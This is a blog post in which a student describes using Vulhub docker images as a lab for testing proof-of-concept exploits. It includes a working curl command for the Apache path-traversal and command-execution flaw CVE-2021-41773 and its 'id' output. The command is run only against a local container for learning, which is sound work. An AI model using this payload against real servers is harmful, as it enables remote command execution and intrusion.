Hey there! I still exist! I finally finished up a monster semester so hopefully I’ll have a bit more time to work on this blog over the summer.

Lately I’ve been wanting to try my hand at creating PoC’s for known vulnerabilities. I’ve spent a lot of time working on ctf practice and I will definitely continue to do that, but I found myself wanting to use some of that experience on a real system.

The biggest hurdle for me was setting up an environment that I could test it in. I tried messing around with docker to checkout vulnerable versions of software and build from source, which proved to be a nightmare and I don’t think I ever once got it to work. I figured there was probably an easier way to setup a system that was innately vulnerable without having to jump through hoops but I wasn’t sure how to find it.

Enter Vulhub

Recently I discovered a GitHub repo called Vulhub. From my understanding, it is a repo that contains hundreds of docker images specially configured to be vulnerable to a specific attack. This is exactly what I was looking for! I spent some time perusing through the different images and decided to test it out on a vulnerability I was somewhat familiar with.

Using Vulhub (CVE-2021-41773)

I checked to see if Vulhub had the vulnerable image for this CVE, and sure enough it did! To set up, I just had to do

cd vulhub/httpd/CVE-2021-41773/

docker compose up -d

This immediately spun up an Apache web server listening on port 8080. Pretty slick! From there, I simply messed around a bit with the vulnerability. The point of this post isn’t to discuss CVE-2021-41773, but essentially the Apache server had a vulnerability that allowed for path traversal by encoding a ‘.’ character as ‘%2e’. I tested a PoC payload against the running docker image and got:

$ curl --path-as-is -s -X POST   "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"   --data "echo Content-Type: text/plain; echo; id;"

uid=1(daemon) gid=1(daemon) groups=1(daemon)

So there we have it! The docker image was vulnerable to CVE-2021-41773, and this is a valid environment to test it on. This is huge for my learning process and I plan to use it for much more exploration.

Some considerations

The main drawback for me personally of this method is that vulhub is mostly focused on web security. There is a lot of great stuff here, but in the future I want to do this kind of thing for memory corruption as well. I have had even more trouble with setting up an environment for PoC testing with memory corruption CVE’s, and this still doesn’t quite fix that. I will absolutely be using vulhub copiously, but I am still looking for something else for my learning process.